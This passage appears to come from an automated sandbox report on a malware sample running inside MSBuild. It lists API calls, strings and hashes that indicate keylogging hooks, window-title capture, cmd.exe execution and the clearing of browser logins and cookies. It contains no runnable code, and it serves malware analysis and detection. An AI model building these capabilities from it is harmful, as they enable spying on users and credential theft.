                                                                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                            Function 00447790 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocaleValid
                                                                                                                                            • String ID: IsValidLocaleName$j=D$u;~/
                                                                                                                                            • API String ID: 1901932003-4051686270
                                                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                            Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                                                            • API String ID: 587946157-3896048727
                                                                                                                                            • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                            • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                            Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                            • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                            Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                            Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                            • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                            • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                            Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                            Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                            • __freea.LIBCMT ref: 100087D5
                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                            Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                                                            • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                            • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                            Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                                                            • String ID: @CG$exepath$BG
                                                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                            Function 004185F1 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                                                                            • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                                                                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                                                                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1432082543-0
                                                                                                                                            • Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                            • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                            • Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                            • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                            Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 188215759-0
                                                                                                                                            • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                            • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                                                            • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                            • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                                                            Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                                                            • String ID: [ $ ]
                                                                                                                                            • API String ID: 3309952895-93608704
                                                                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                            Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                            Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                            Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 737400349-0
                                                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                            Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                            Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                            Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
